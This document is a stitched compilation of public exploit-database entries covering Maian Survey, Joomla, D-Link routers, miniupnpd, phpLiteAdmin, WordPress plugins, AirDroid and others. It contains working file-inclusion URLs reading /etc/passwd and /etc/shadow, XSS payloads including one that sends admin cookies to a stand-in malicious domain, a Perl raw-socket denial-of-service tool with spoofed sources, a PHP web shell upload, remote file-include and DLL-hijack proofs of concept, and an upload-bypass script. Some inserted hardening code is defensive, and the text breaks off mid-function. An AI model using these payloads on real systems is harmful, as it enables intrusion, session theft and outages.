source: https://www.securityfocus.com/bid/54613/info
Maian Survey is prone to a URI-redirection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to execute arbitrary local files within the context of the webserver process or redirect users to a potentially malicious site. This may aid in phishing attacks or allow the attacker to compromise the application; other attacks are also possible.
Maian Survey 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/[PATH]/admin/index.php?cmd=LF�°_here
source: https://www.securityfocus.com/bid/54611/info
The 'com_hello' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/54599/info
Arora Browser is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, causing a denial-of-service condition.
<html>
<head>
<title>Arora Browser Remote Denial of Service</title>
<script type="text/javascript">
// Builds a string of roughly 64 million 'A' characters (8000 * 8001)
// and assigns it to document.title; the browser fails while handling it.
function loxians() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body bgcolor="Grey">
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></h2>
</center>
</body>
</html>
#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Usage:
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT STATE SERVICE
# 1900/udp open upnp
# | upnp-info:
# | 192.168.1.1
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0
# | Location: http://192.168.1.1:5000/rootDesc.xml
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# | Name: INFOMARK Router
# | Manufacturer: INFOMARK
# | Model Descr: INFOMARK Router
# | Model Name: INFOMARK Router
# | Model Version: 1
# | Name: WANDevice
# | Manufacturer: MiniUPnP
# | Model Descr: WAN Device
# | Model Name: WAN Device
# | Model Version: 20070228
# | Name: WANConnectionDevice
# | Manufacturer: MiniUPnP
# | Model Descr: MiniUPnP daemon
# | Model Name: MiniUPnPd
# |_ Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT STATE SERVICE
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#
use Socket;
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}
my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];
print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);
if (!defined $ip_dst) {
print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
select(undef, undef, undef, 0.55);
print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
print "[ Example:\n[ perl $0 192.168.1.1\n";
print "[ =============================================== ]\n";
print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
exit;
}
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();
# Main program
sub main {
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= payload();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
# IP Packet construction
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$ip_src, $ip_dst
);
return $iphdr;
}
# UDP header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Source Port (16 bits) (0-65535)
my $udp_dst_port = 1900; # UDP Dest Port (16 bits) (0-65535)
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (0 = not computed)
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port, $udp_dst_port,
$udp_len, $udp_checksum
);
return $udphdr;
}
# Create SSDP Bomb
sub payload {
my $data;
my $head;
$data = "M-SEARCH * HTTP\/1.1\\r\\n";
for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
my $payload = pack('a' . length($data), $data);
return $payload;
}
# Generate random source ip address
sub randip () {
srand(time() ^ ($$ + ($$ << 15)));
my $ipdata;
$ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
my $ipsrc = pack('A' . length($ipdata), rand($ipdata));
return $ipdata;
}
# Send the malformed packet
sub send_packet {
print "[ Target: $ARGV[0]\n";
select(undef, undef, undef, 0.30);
print "[ Send malformed SSDP packet..\n\n";
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in
#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################
Summary:
The Dlink DSL-2750u and DSL-2730u wireless router improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.
Desc:
The router suffers from an authenticated local file inclusion (LFI)
vulnerability: input passed through the 'getpage' parameter to the 'webproc'
script is not properly verified before being used to include files. This can
be exploited to include files from local resources.
Tested on: mini_httpd/1.19 19dec2003
===============================================================
GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive
HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive
HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
# Exploit Title: CSRF & XSS
# Google Dork: intitle: CSRF & XSS
# Date: 2015-07-05
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: bitbucket.org/phpliteadmin
# Software Link: bitbucket.org/phpliteadmin
# Version: v1.1
# Tested on: windows 7
# Category: webapps
Vendor:
================================
bitbucket.org/phpliteadmin
Product:
================================
phpLiteAdmin v1.1
Advisory Information:
================================================
CSRF & XSS Vulnerabilities
Vulnerability Details:
======================
CSRF:
------
No CSRF token exists when making calls to various SQL operations,
therefore we can get a user to drop whole database tables if they click
on our malicious link and the table name is known.
XSS:
------
There are three XSS vulnerabilities I point out: the first is the use of
'PHP_SELF', the second is an unsanitized parameter for the SQL statement
when calling the drop table method, e.g. '
http://localhost/phpliteadmin.php?droptable=[XSS]'
and the third is an unsanitized 'table' parameter, e.g. '
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'
Let's look at the first one more in depth as it's more fun.
phpliteadmin uses the PHP reserved server variable $_SERVER['PHP_SELF'], which
is vulnerable if not used correctly,
allowing us to inject an XSS payload to steal session cookies and navigate
the user to a place of our choosing
in order to cause mayhem.
On line 32 of 'phpliteadmin.php' we find vulnerable code:
--------------------------------------------------------
//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']);
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];
//constants
define("VERSION", "1.1");
define("PAGE", $thisName);
-------------------------------------------------------
In PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document
root."
ref: http://php.net/manual/en/reserved.variables.server.php
It is known that $_SERVER['PHP_SELF'] can make your application insecure, as we
can inject code following a forward slash "/".
But we have a slight problem to overcome: we can execute code, but our forward
slashes will not be processed correctly
and the exploit will FAIL, leaving us with the following useless URL instead of
taking the victim to a domain of our choice.
Fail exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/
"'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"
Failed Result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org
But all is NOT lost! We will construct the forward slashes of our malicious URL
in our JS call to the window.open() method using
String.fromCharCode(58) for ':' and String.fromCharCode(47) for '/', which will
NOW give us what we seek: control over the user's browser,
taking them to some terrible dark place.
Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:
Tada!, our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'
hyp3rlinx.altervista.org';window.open(x);})()"
Exploit code(s):
===============
XSS(s) POC:
----------
1- $_SERVER['PHP_SELF'] XSS exploit steals current admin session cookie and
sends to remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"
2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=
<script>alert(666)</script>
3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=
"/><script>alert(666)</script>
CSRF POC:
---------
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1
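As an added example rather than phpLiteAdmin's own code, a hardened counterpart to the vulnerable PAGE derivation quoted above, plus escaping for the reflected 'table' and 'droptable' values and a session CSRF token for the drop action; function names such as h(), valid_table_name() and handle_droptable() are assumptions.

```php
<?php
// Added example, not phpLiteAdmin code: hardened handling of the three
// issues described in this advisory. All names here are assumptions.
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// 1. PAGE: derive the script name from the filesystem, not from PHP_SELF.
//    PHP_SELF carries PATH_INFO, so /phpliteadmin.php/"onMouseOver=... ends
//    up in the constant and, wherever PAGE is echoed, in the HTML.
define("PAGE", basename(__FILE__));

// Escape helper for anything reflected into HTML (table names, messages).
function h($s) {
    return htmlspecialchars((string)$s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 2. Table names: validate against a strict allow-list pattern before they
//    reach either the SQL statement or the HTML, and escape on output anyway.
function valid_table_name($name) {
    return is_string($name)
        && preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $name) === 1;
}

// 3. CSRF: a per-session random token that every state-changing request
//    must carry; compared in constant time.
function csrf_token() {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check($submitted) {
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Drop-table action: POST only, token required, name validated, output escaped.
function handle_droptable(PDO $db) {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !csrf_check($_POST['csrf'] ?? null)) {
        http_response_code(403);
        return "Request rejected: missing or invalid CSRF token.";
    }
    $table = $_POST['droptable'] ?? '';
    if (!valid_table_name($table)) {
        http_response_code(400);
        // The rejected value is escaped, so it cannot carry markup back.
        return "Invalid table name: " . h($table);
    }
    // SQLite cannot bind identifiers, so quote the already validated name.
    $db->exec('DROP TABLE IF EXISTS "' . str_replace('"', '""', $table) . '"');
    return "Dropped table " . h($table) . ".";
}

// The form that issues the action carries the token as a hidden field.
function droptable_form($table) {
    return '<form method="post" action="' . h(PAGE) . '">'
         . '<input type="hidden" name="csrf" value="' . h(csrf_token()) . '">'
         . '<input type="hidden" name="droptable" value="' . h($table) . '">'
         . '<input type="submit" value="Drop table ' . h($table) . '">'
         . '</form>';
}
```

With PAGE no longer derived from the request path, the PATH_INFO trick in the first PoC has nothing to inject into; the token turns the one-click drop link into a forged request the server refuses.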
Disclosure Timeline:
=========================================================
Vendor Notification: NA
July 5, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] phpliteadmin_v1-1
Vulnerable Parameter(s): [+] $_SERVER['PHP_SELF'], droptable, table
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
source: https://www.securityfocus.com/bid/54593/info
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable.
www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
File Path: site/wp-content/uploads/uigen_YEAR/file.php
Example: site/wp-content/uploads/uigen_2015/evil.php
evil.php: <?php passthru($_GET['cmd']); ?>
TUNISIAN CYBER(miutex)-S4E
/*
source: https://www.securityfocus.com/bid/54477/info
Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.
Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it.
*/
#include <windows.h>

/* Payload executed once the planted DLL is loaded: start calc.exe as a
 * visible proof that code from the network share ran in the process. */
int hijack_poc(void)
{
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    /* Run the payload only when the process first maps the DLL. */
    if (dwReason == DLL_PROCESS_ATTACH) {
        hijack_poc();
    }
    return TRUE;
}
source: https://www.securityfocus.com/bid/54591/info
AVA VoIP is prone to multiple security vulnerabilities because the application fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, upload and execute arbitrary files in the context of the web server, and launch other attacks.
AVA VoIP 1.5.12 is vulnerable; other versions may also be affected.
http://www.example.com/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
source: https://www.securityfocus.com/bid/54470/info
EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00
source: https://www.securityfocus.com/bid/54466/info
web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
web@all 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E
source: https://www.securityfocus.com/bid/54467/info
Rama Zeiten CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
Rama Zeiten CMS 0.99 is vulnerable; other versions may also be affected.
http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd
source: https://www.securityfocus.com/bid/54456/info
Simple Machines is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected.
Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by a remote attacker with a local low-privileged user account and low required
user interaction. For demonstration or to reproduce ...
Review: Package Manager > Download New Packages > FTP Information Required (Listing)
<dd>
<input size="30" name="ftp_server" id="ftp_server" type="text"><[PERSISTENT SCRIPT CODE]' <"="" class="input_text">
<label for="ftp_port">Port: </label>
<input type="text" size="3" name="ftp_port" id="ftp_port" value="21"
class="input_text" />
... or
<dd>
<input size="50" name="ftp_path" id="ftp_path" value="public_html/demo/smf "
type="text"><[PERSISTENT SCRIPT CODE])' <"="" style="width: 99%;" class="input_text">
</dd>
</dl>
<div class="righttext">
URL: http://www.example.com/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626
Review: Smiley Sets > Add
<tr class="windowbg" id="list_smiley_set_list_0">
<td style="text-align: center;"></td>
<td class="windowbg">Akyhne's Set</td>
<td class="windowbg">"><[PERSISTENT SCRIPT CODE]' <="" <strong="">
akyhne</strong>/...</td>
URL: http://www.example.com/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2
Review: Newsletter > Add
<input name="email_force" value="0" type="hidden">
<input name="total_emails" value="1" type="hidden">
<input name="max_id_member" value="13" type="hidden">
<input name="groups" value="0,1,2,3" type="hidden">
<input name="exclude_groups" value="0,1,2,3" type="hidden">
<input name="members" value="" type="hidden">
<input name="exclude_members" value="" type="hidden">
<input name="emails" value="" type="hidden"><[PERSISTENT SCRIPT CODE])' <"="">
</form>
</div>
<br class="clear" />
</div>
URL: http://www.example.com/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
Review: Edit Membergroups & User/Groups Listing
<h3 class="catbg">Edit Membergroup - "><[PERSISTENT SCRIPT CODE])' <"=""><[PERSISTENT SCRIPT CODE]) <"
><ifram
</h3>
</div>
<div class="windowbg2">
<span class="topslice"><span></span></span>
URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
source: https://www.securityfocus.com/bid/54459/info
The Post Recommendations plug-in for WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Post Recommendations 1.1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('abspath'=>"http://localhost/lo.txt\0"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
lo.txt
<?php phpinfo(); ?>
#/IN THE NAME OF GOD
#/auth====PARSA ADIB
import sys
import requests


def logo():
    print("\t\t" + r" .__ .___ .__ .___")
    print("\t\t" + r"_____ |__|______ __| _/______ ____ |__| __| _/")
    print("\t\t" + r"\__ \ | \_ __ \/ __ |\_ __ \/ _ \| |/ __ | ")
    print("\t\t" + r" / __ \| || | \/ /_/ | | | \( <_> ) / /_/ | ")
    print("\t\t" + r"(____ /__||__| \____ | |__| \____/|__\____ | ")
    print("\t\t" + r" \/ \/ \/ ")
    print("\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib")


if len(sys.argv) != 6:
    logo()
    print("\t\tUSAGE: python exploit.py ip port remote-file-name local-file-name remote-file-path")
    print("\t\tEXAMPLE: python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard")
else:
    logo()
    print("\n[+]Receiving Details\n-----------------------------")
    # The ping endpoint answers without authentication and identifies the device.
    try:
        p = requests.get('http://' + sys.argv[1] + ':' + sys.argv[2] + '/sdctl/comm/ping/')
    except IOError:
        print("\n[!] Check if server is running")
        sys.exit()
    for i in p.text.split(','):
        for char in '{"}_':
            i = i.replace(char, '').upper()
        print("[*]" + i)
    print("\n[+]Sending File\n-----------------------------")
    # The upload endpoint accepts the file without checking for a logged-in session.
    try:
        r = requests.post('http://' + sys.argv[1] + ':' + sys.argv[2] + '/sdctl/comm/upload/dir?fn=' + sys.argv[3] + '&d=' + sys.argv[5] + '&after=1&fname=' + sys.argv[3],
                          files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
        if r.status_code == 200:
            print("[*]RESPONSE:200")
            print("[*]FILE SENT SUCCESSFULLY")
    except IOError:
        print("\n[!] Error")
source: https://www.securityfocus.com/bid/54172/info
Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
##################################################
# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
# Version : 1.0.4
# Link : http://www.silverstripe.org/pixlr-image-editor-module/
# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
# Date : 21-06-2012
# Google Dork : not discover
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
lo.php
<?php
phpinfo();
?>
# Exploit Title: D-Link DSP-W Arbitrary file upload
# Date: 30/06/2015
# Exploit Author: DNO
# Vendor Homepage: [link]
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
The only 'filtering' on this resource appears to be a sprintf()
call which statically prefixes a submitted 'dev' argument with '/www'.
However,
if an HTTP request is performed without a 'dev' argument at all, the
sprintf() call is never reached,
and a fully-qualified path can be provided in the 'path' parameter,
bypassing the upload path restriction.
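The failure mode described above is a check that lives on only one branch: the '/www' prefix is added inside the sprintf() that handles 'dev', so a request carrying only 'path' never reaches it. As an added example, not the device's firmware (whose CGI source is not on this page), here is the shape of a resolver that enforces the base directory on every request regardless of which parameters are present; UPLOAD_BASE, resolve_upload_target() and the sample requests are assumptions.

```php
<?php
// Added example, not firmware code (PHP 8): resolve an upload destination so
// that the base directory is enforced on every code path. Names are assumed.

const UPLOAD_BASE = '/www';   // the only directory uploads may land in

// Returns the confined absolute path for the upload, or null if the request
// would escape UPLOAD_BASE. 'dev' and 'path' are both optional, as in the
// vulnerable handler; neither one is allowed to opt out of the prefix.
function resolve_upload_target(array $params, string $filename): ?string {
    // Whichever parameter supplied the directory, the prefix is applied to it.
    $sub = $params['dev'] ?? $params['path'] ?? '';
    // Reject NUL bytes (used for truncation tricks) and an empty filename.
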